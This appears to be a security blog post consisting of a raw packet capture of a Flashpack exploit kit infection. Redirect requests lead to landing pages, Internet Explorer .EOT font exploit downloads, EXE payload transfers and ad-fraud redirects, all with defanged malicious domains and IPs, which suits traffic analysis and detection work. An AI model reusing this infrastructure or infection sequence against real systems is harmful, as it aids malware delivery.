Flashpack Web Based Exploit Kit Exploits Internet Explorer .EOT Font File – Monetizes with Adultfriendfinder and Other Ads

By | June 19, 2015

2014-05-18 22:27:26.841394 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [P.], seq 1:430, ack 1, win 64240, length 429
E…..@….,….Y.f”…P@HD.3.:[P….k..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: hitcric[.]info
Connection: Keep-Alive

2014-05-18 22:27:26.841401 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [.], ack 430, win 64240, length 0
E..(…….KY.f”…..P..3.:[@HF.P………….
2014-05-18 22:27:26.888269 IP 89.46.102.34.80 > 192.168.204.222.49382: Flags [S.], seq 1406020076, ack 4071120677, win 64240, options [mss 1460], length 0
E..,…….FY.f”…..P..S.)…_%`………….
2014-05-18 22:27:26.888430 IP 192.168.204.222.49382 > 89.46.102.34.80: Flags [.], ack 1, win 64240, length 0
E..(. @………Y.f”…P.._%S.).P….K……..
2014-05-18 22:27:27.030069 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [FP.], seq 1:520, ack 430, win 64240, length 519
E../…….BY.f”…..P..3.:[@HF.P…,]..HTTP/1.1 302 Moved Temporarily
Server: nginx admin
Date: Mon, 19 May 2014 02:13:42 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==


302 Found

302 Found


nginx


2014-05-18 22:27:27.030270 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [.], ack 521, win 63721, length 0
E..(.!@………Y.f”…P@HF.3. 89.46.102.34.80: Flags [F.], seq 430, ack 521, win 63721, length 0
E..(.”@………Y.f”…P@HF.3. 192.168.204.222.49381: Flags [.], ack 431, win 64239, length 0
E..(…….HY.f”…..P..3. 95.154.246.90.80: Flags [S], seq 666254775, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.%@….”…._..Z…P’.=……. .D……………
2014-05-18 22:27:28.423428 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [S.], seq 1859092066, ack 666254776, win 64240, options [mss 1460], length 0
E..,……f._..Z…..P..n.~b’.=.`………….
2014-05-18 22:27:28.423508 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [.], ack 1, win 64240, length 0
E..(.&@….-…._..Z…P’.=.n.~cP………….
2014-05-18 22:27:28.423985 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1:606, ack 1, win 64240, length 605
E….’@………_..Z…P’.=.n.~cP…….GET /index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw== HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

2014-05-18 22:27:28.906353 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1:879, ack 606, win 64240, length 878
E………c2_..Z…..P..n.~c’.@.P…e…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:01 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

23b
………..S.n.0.}.WX}.AP.N.Z% …:.V..0mRH.bp………t{…].:…{.kF4&m`F…B1%…..L…S9.\..+[.~.7.-Ia…. X4….4+.7 …….J./w….^……..Gcg.2..so..(\.*….$N…lK….Z..P……..*…..,U..e….j…o..E<.h..\1....m..#Y.......\....U&Yf.0..........9.%K....q.....D..!/..G^..2.T.\G....^......0.,|.&.e.[d...@;c.7... 4.2.jg.....U.P.AU.lr....+.K..i..e-....Y.K.$sOB..'}&.N{;.Z.c1.../O....y.......4.wC...........n....A...d...he.....b...pJ.......p.{..N {.........v...nG....=....^Xc..3.-...........t.I>.|.,…^.ueH[D…4.@..Q.y.$.=.|……W…..j*.Y4.1.lR.4………(……
0

2014-05-18 22:27:28.940736 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 606:841, ack 879, win 63362, length 235
E….(@….@…._..Z…P’.@.n…P…….GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:28.940845 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 841, win 64240, length 0
E..(……f._..Z…..P..n…’.A.P………….
2014-05-18 22:27:29.224386 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 879:1276, ack 841, win 64240, length 397
E………e._..Z…..P..n…’.A.P…….HTTP/1.1 404 Not Found
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:29 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive

cd


404 Not Found

Not Found


The requested URL /favicon.ico was not found on this server.


0

2014-05-18 22:27:29.323940 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 879:1276, ack 841, win 64240, length 397
E………e._..Z…..P..n…’.A.P…….HTTP/1.1 404 Not Found
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:29 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive

2014-05-18 22:27:29.641761 IP 192.168.204.222.49384 > 95.154.246.90.80: Flags [P.], seq 1:533, ack 1, win 64240, length 532
E..<..@........._..Z...PX,\.Y(..P...W...GET /index2.php HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw== Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Accept-Encoding: gzip, deflate Host: ley9nbu9c4c5r3oie3819it529953c1805362f91a2d16b6d071fd5b0.ns1.bayandovmeci[.]com Connection: Keep-Alive 2014-05-18 22:27:29.641819 IP 95.154.246.90.80 > 192.168.204.222.49384: Flags [.], ack 533, win 64240, length 0
E..(……f._..Z…..P..Y(..X,^.P….[……..
2014-05-18 22:27:29.916121 IP 95.154.246.90.80 > 192.168.204.222.49384: Flags [P.], seq 1:1246, ack 533, win 64240, length 1245
E………a._..Z…..P..Y(..X,^.P…Y…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Mon, 19 May 2014 02:27:29 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

3aa
………..U[..H.~.d…..iG.Ko……+…4lf..*.-…-….*…I6..MH.U|.;.9….$..-@..h$$………Z…%..h9….nn.”.$Lb…!.s….7……t..0.=.’……\..m1.J.;q.;q.{p,+..W:5..[._.J…N.b.6…..)-…P.A.+T.B%
.*..C^r{-I5.rk…..gI4..F D<.T.....RPo_/F..YQ........I..}2D..>…o…..!a.x.v….}…_.”e…. p..zjZ…….c….$i.g..i..;[ .19.E.D..-….{….Z…r…e._…….y.-..Z!h…lq..K….R..r3.l….#._W….pfF@z..=..E..-…!……..B.o….a-….9″…..o\k.hsbO..V…..9….:L@…t@.\…….S7n..0.%1.f.s._”^Nq.. q..3.L……….;…..z..)..mi.j.lL………..M..R…..Z.u6T.D.3…)..F….r..y.J.x…..”>..N5….kc.`.. |.Bs?..i/..L….l.,…………8……..X…..#.t….>…(=..S|.\?.^i.l..{…’………j.+Z…r.vt..o.?.`/.u…..g.f..}v..$.(#CD….h……….CV.6w..3r.{.?.n}.t…o…….M..h….
0

2014-05-18 22:27:29.942775 IP 192.168.204.222.49384 > 95.154.246.90.80: Flags [P.], seq 533:801, ack 1246, win 62995, length 268
E..4./@………_..Z…PX,^.Y(..P…b…GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: ley9nbu9c4c5r3oie3819it529953c1805362f91a2d16b6d071fd5b0.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:29.942853 IP 95.154.246.90.80 > 192.168.204.222.49384: Flags [.], ack 801, win 64240, length 0
E..(……f._..Z…..P..Y(..X,_.P…zr……..
2014-05-18 22:27:30.350876 IP 95.154.246.90.80 > 192.168.204.222.49384: Flags [P.], seq 1246:1643, ack 801, win 64240, length 397
E………e _..Z…..P..Y(..X,_.P…w…HTTP/1.1 404 Not Found
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:30 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
2014-05-18 22:27:30.657384 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 841:1255, ack 1276, win 62965, length 414
E….1@………_..Z…P’.A.n..^P…#…GET /tresting/avalonr/allow.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it529953c1805362f91a2d16b6d071fd5b0.ns1.bayandovmeci[.]com/index2.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:30.657637 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 1255, win 64240, length 0
E..(……f._..Z…..P..n..^’.B.P………….
2014-05-18 22:27:30.955568 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1276:1814, ack 1255, win 64240, length 538
E..B……dy_..Z…..P..n..^’.B.P…….HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3

15b




Not Found





0
2014-05-18 22:27:30.959106 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1255:1806, ack 1814, win 64240, length 551
E..O.2@………_..Z…P’.B.n..xP…@$..GET /tresting/avalonr/js/pd.php?id=6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:30.959116 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 1806, win 64240, length 0
E..(……f._..Z…..P..n..x’.D.P….l……..
2014-05-18 22:27:31.403552 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1814:3082, ack 1806, win 64240, length 1268
E………a._..Z…..P..n..x’.D.P…….HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
2014-05-18 22:27:46.874353 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1806:2505, ack 47970, win 62795, length 699
E….A@….W…._..Z…P’.D.n.9.P..K.4..POST /tresting/avalonr/json.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Content-Length: 207
Connection: Keep-Alive
Cache-Control: no-cache

id=306a617661646273696c766572666c323031346d736965387c6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d
2014-05-18 22:27:46.874411 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 2505, win 64240, length 0
E..(……fk_..Z…..P..n.9.’.G.P….d……..
2014-05-18 22:27:47.692844 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 47970:48554, ack 2505, win 64240, length 584
E..p……d”_..Z…..P..n.9.’.G.P…L…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3

189







0

2014-05-18 22:27:47.708697 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 2505:2900, ack 48554, win 64240, length 395
E….B@………_..Z…P’.G.n.<.P.......GET /tresting/avalonr/msie.php HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/json.php Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Accept-Encoding: gzip, deflate Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com Connection: Keep-Alive 2014-05-18 22:27:48.285586 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 401:686, ack 972, win 63269, length 285
E..E.[@………_..Z…PcS%&g^w6P..%….GET /tresting/avalonr/include/add8dc99221ed3fa474c85b43f3262ed.eot HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:48.285695 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 686, win 64240, length 0
E..(……f=_..Z…..P..g^w6cS&CP………….
2014-05-18 22:27:48.285703 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [.], ack 83580, win 64240, length 0
E..(.\@………_..Z…P’.I.n…P…k………
2014-05-18 22:27:48.599716 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 972:2240, ack 686, win 64240, length 1268
E………aH_..Z…..P..g^w6cS&CP….c..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:48 GMT
Content-Type: application/octet-stream
Content-Length: 22319
Connection: keep-alive
Last-Modified: Mon, 19 May 2014 02:25:29 GMT
ETag: “53796b99-572f”
Accept-Ranges: bytes
2014-05-18 22:27:52.038864 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 686:842, ack 23546, win 64240, length 156
E….d@….S…._..Z…PcS&Cg^.dP…….GET /tresting/avalonr/include/1f55ea0e76576767cbd3d4e266e5dacf.eot HTTP/1.1
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Cache-Control: no-cache

2014-05-18 22:27:52.038923 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 842, win 64240, length 0
E..(.+….f(_..Z…..P..g^.dcS&.P…O5……..
2014-05-18 22:27:52.327008 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 23546:24814, ack 842, win 64240, length 1268
E….,….a3_..Z…..P..g^.dcS&.P…….HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:52 GMT
Content-Type: application/octet-stream
Content-Length: 13312
Connection: keep-alive
Last-Modified: Mon, 19 May 2014 02:25:29 GMT
ETag: “53796b99-3400”
Accept-Ranges: bytes

tc.9:999=999..99.9999999y99999999999999999999999999999999999.9997&.79.0…8u..mQPJ.IKV^KXT.ZXWWVM.[\.KLW.PW.}vj.TV]\.443.9999999..1…_C.._C.._C..^C.._C…C.._C…C.._C…C.._C…C.._C..?C.._C…C.._CkPZQ.._C9999999999999999i|99u8=9..;q99999999.97.28>39.9991999999 +999)999y9999P`9)999;99<989<989=99999999I999=99..99:99=99=99)9999)99)999999)999i.99V999a.99A9999i999=9999999999999999999Y99E899.)99%99999999999999999999999999999999999A;99.9999)99.999999999999999999999999999.M\AM999..999)999.999=99999999999999.99Y.]XMX999)9999y999;999.99999999999999y99..KJKZ9999=999i999=999.99999999999999y99y.K\UVZ99.8999Y999;999.99999999999999y99{..;q.999..;qz999..;qi989..;qd999".;q^999(.;qK99999999999TJOZKM.]UU9x}oxip ..]UU9r|kw|u ..]UU9wm}uu.}uu9lj|k ..]UU9jq|uu ..]UU9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 2014-05-18 22:27:53.032447 IP 192.168.204.222.49390 > 95.154.246.90.80: Flags [.], ack 1, win 64240, length 0
E..(.r@………_..Z…P.=.d90L.P….l……..
2014-05-18 22:27:53.033429 IP 192.168.204.222.49389 > 95.154.246.90.80: Flags [P.], seq 1:422, ack 1, win 64240, length 421
E….s@….;…._..Z…P..3″E.!6P…….GET /adsort.php?yy=1&aid=2&atr=exts&src=299 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it529953c1805362f91a2d16b6d071fd5b0.ns1.bayandovmeci[.]com/index2.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: n2yiu4b6vo91nruocik9or9.4gadgets[.]com.mx
Connection: Keep-Alive

2014-05-18 22:27:53.033466 IP 95.154.246.90.80 > 192.168.204.222.49389: Flags [.], ack 422, win 64240, length 0
E..(.=….f._..Z…..P..E.!6..4.P………….
2014-05-18 22:27:53.037149 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [S.], seq 695012549, ack 1076455371, win 64240, options [mss 1460], length 0
E..,.>….f._..Z…..P..)m..@)g.`….C……..
2014-05-18 22:27:53.037493 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [.], ack 1, win 64240, length 0
E..(.t@………_..Z…P@)g.)m..P…2………
2014-05-18 22:27:53.049638 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342
E..~.u@………_..Z…P@)g.)m..P…=l..GET /tresting/avalonr/loadsilver.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:53.049647 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [.], ack 343, win 64240, length 0
E..(.?….f._..Z…..P..)m..@)i!P…0………
2014-05-18 22:27:53.257927 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [P.], seq 1:1269, ack 343, win 64240, length 1268
E….@….a._..Z…..P..)m..@)i!P….L..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:53 GMT
Content-Type: application/octet-stream
Content-Length: 94514
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Accept-Ranges: bytes
Content-Disposition: inline; filename=e53796b9e8cb041400466334.exe

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
2014-05-18 22:28:08.099520 IP 95.154.246.90.80 > 192.168.204.222.49390: Flags [P.], seq 341:935, ack 595, win 64240, length 594
E..z……cF_..Z…..P..90N>.=..P…’p..HTTP/1.1 302 Found
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:28:08 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 232
Connection: keep-alive
Set-Cookie: bfmvi=IwkbADQAAgACADdseVP__zdseVNAAAEAAAA3bHlTAA–; expires=Tue, 19-May-2015 02:28:07 GMT; path=/; domain=trafspot[.]com
Location: http://adultfriendfinder[.]com/go/p1011105.subdirs



302 Found

Found

The document has moved here.

2014-05-18 22:28:08.148899 IP 192.168.204.222.49396 > 208.88.180.72.80: Flags [S], seq 3046917735, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……….X.H…P..Fg…… ……………..
2014-05-18 22:28:08.199274 IP 95.154.246.90.80 > 192.168.204.222.49390: Flags [P.], seq 341:935, ack 595, win 64240, length 594
E..z……cD_..Z…..P..90N>.=..P…’p..HTTP/1.1 302 Found
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:28:08 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 232
Connection: keep-alive
Set-Cookie: bfmvi=IwkbADQAAgACADdseVP__zdseVNAAAEAAAA3bHlTAA–; expires=Tue, 19-May-2015 02:28:07 GMT; path=/; domain=trafspot[.]com
Location: http://adultfriendfinder[.]com/go/p1011105.subdirs



302 Found

Found

The document has moved here.

2014-05-18 22:28:08.199756 IP 192.168.204.222.49390 > 95.154.246.90.80: Flags [.], ack 935, win 63306, length 0
E..(..@………_..Z…P.=..90P.P..J……….
2014-05-18 22:28:08.270272 IP 208.88.180.72.80 > 192.168.204.222.49396: Flags [S.], seq 1168056471, ack 3046917736, win 64240, options [mss 1460], length 0
E..,……6..X.H…..P..E. …Fh`…g}……..
2014-05-18 22:28:08.270376 IP 192.168.204.222.49396 > 208.88.180.72.80: Flags [.], ack 1, win 64240, length 0
E..(..@……….X.H…P..FhE. .P….:……..
2014-05-18 22:28:08.271115 IP 192.168.204.222.49396 > 208.88.180.72.80: Flags [P.], seq 1:279, ack 1, win 64240, length 278
E..>..@……….X.H…P..FhE. .P….?..GET /go/p1011105.subdirs HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: adultfriendfinder[.]com
Connection: Keep-Alive
2014-05-18 22:29:03.071417 IP 192.168.204.222.49420 > 173.194.116.114.80: Flags [P.], seq 1:64, ack 1, win 64240, length 63
E..g.R@…/…….tr…P i..J%.2P….*..GET /robots.txt HTTP/1.1
Host: www.google[.]com
Accept: */*

2014-05-18 22:29:03.071533 IP 173.194.116.114.80 > 192.168.204.222.49420: Flags [.], ack 64, win 64240, length 0
E..(……….tr…..P..J%.2 i..P…!!……..
2014-05-18 22:29:03.170536 IP 91.121.84.116.21967 > 192.168.204.222.49421: Flags [P.], seq 13:81, ack 27, win 64240, length 68
E..l……..[yTt….U…..:P….P….P..s..?.
..mb?”/”9>c959m….b|c|@G.”>9wm:::c*””*!(c.” @G…(=9wmgbg@G@G
2014-05-18 22:29:03.170948 IP 192.168.204.222.49421 > 91.121.84.116.21967: Flags [.], ack 81, win 64160, length 0
E..(.S@………[yTt..U…….:.P….6……..
2014-05-18 22:29:03.227511 IP 173.194.116.114.80 > 192.168.204.222.49420: Flags [P.], seq 1:1269, ack 64, win 64240, length 1268
E………….tr…..P..J%.2 i..P….(..HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 15 Apr 2014 23:05:12 GMT
Date: Mon, 19 May 2014 02:29:03 GMT
Expires: Mon, 19 May 2014 02:29:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Alternate-Protocol: 80:quic
Transfer-Encoding: chunked

1db8
User-agent: *
Disallow: /search
Disallow: /sdch
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Allow: /catalogs/about
Allow: /catalogs/p?
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow: /index.html?
Disallow: /?
Allow: /?hl=
Disallow: /?hl=*&
Disallow: /addurl/image?
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /imgres
Disallow: /imglanding
Disallow: /sbd
Disallow: /keyword/
Disallow: /u/
Disallow: /univ/
Disallow: /cobrand
Disallow: /custom
Disallow: /advanced_group_search
Disallow: /googlesite
Disallow: /preferences
Disallow: /setprefs
Disallow: /swr
Disallow: /url
Disallow: /default
Disallow: /m?
Disallow: /m/
Allow: /m/finance
Disallow: /wml?
Disallow: /wml/?
Disallow: /wml/search?
Disallow: /xhtml?
Disallow: /xhtml/?
Disallow: /xhtml/search?
Disallow: /xml?
Disallow: /imode?
Disal
..mbm….b|c|@G.”>9wm|zyc|y~c|yyc{tw.x@G…(=9wmgbg@G@G
2014-05-18 22:29:04.528382 IP 192.168.204.222.49422 > 174.143.144.69.25: Flags [P.], seq 1:57, ack 1, win 64240, length 56
E..`.r@…………E……….Z.P….A..GET / HTTP/1.1
Host: 174.143.144.69:25
Accept: */*

2014-05-18 22:29:04.528467 IP 174.143.144.69.25 > 192.168.204.222.49422: Flags [.], ack 57, win 64240, length 0
E..(.B….x1…E……….Z…..P…A?……..
2014-05-18 22:29:04.627761 IP 91.121.84.116.21967 > 192.168.204.222.49423: Flags [P.], seq 13:74, ack 27, win 64240, length 61
E..e.C……[yTt….U…+V(….!P…….s..8.
..mbm….b|c|@G.”>9wm|zyc|y~c|yyc{tw.x@G…(=9wmgbg@G@G
2014-05-18 22:29:04.627862 IP 192.168.204.222.49423 > 91.121.84.116.21967: Flags [.], ack 74, win 64167, length 0
E..(.s@………[yTt..U….!+V(.P…2_……..
2014-05-18 22:29:04.643628 IP 174.143.144.69.25 > 192.168.204.222.49422: Flags [P.], seq 1:217, ack 57, win 64240, length 216
E….D….wW…E……….Z…..P…y…HTTP/1.1 200 OK
Server: nginx/1.2.8
Date: Mon, 19 May 2014 02:29:04 GMT
Content-Type: text/html
Content-Length: 3
Last-Modified: Wed, 02 Oct 2013 09:22:34 GMT
Connection: keep-alive
Accept-Ranges: bytes
2014-05-18 22:30:17.145134 IP 192.168.204.222.49424 > 95.154.246.90.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341
E..}..@….l…._..Z…P.|>.S.W.P… …GET /software.php?05190230760256453 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:30:17.145324 IP 95.154.246.90.80 > 192.168.204.222.49424: Flags [.], ack 342, win 64240, length 0
E..(.X….`._..Z…..P..S.W..|@DP………….
2014-05-18 22:30:17.399649 IP 95.154.246.90.80 > 192.168.204.222.49424: Flags [P.], seq 1:1269, ack 342, win 64240, length 1268
E….Y….\._..Z…..P..S.W..|@DP…tD..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:30:17 GMT
Content-Type: application/octet-stream
Content-Length: 136536
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Mon, 19 May 2014 02:30:17 +0000
Accept-Ranges: bytes

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$…….1..:u..iu..iu..i…iw..iu..i…i…id..i!..i…i…it..iRichu..i……………………PE..L……K……………..^………..0…….p….@………………………………………………………………..t…….p… …………………………………………………………………p………………………….text…L\…….^……………… ..`.rdata…….p…….b…………..@..@.data…X\………..v…………..@….ndata……………………………..rsrc…. …p…

2014-05-18 22:33:10.843036 IP 91.121.84.116.21967 > 192.168.204.222.49482: Flags [P.], seq 1:7, ack 1, win 64240, length 6
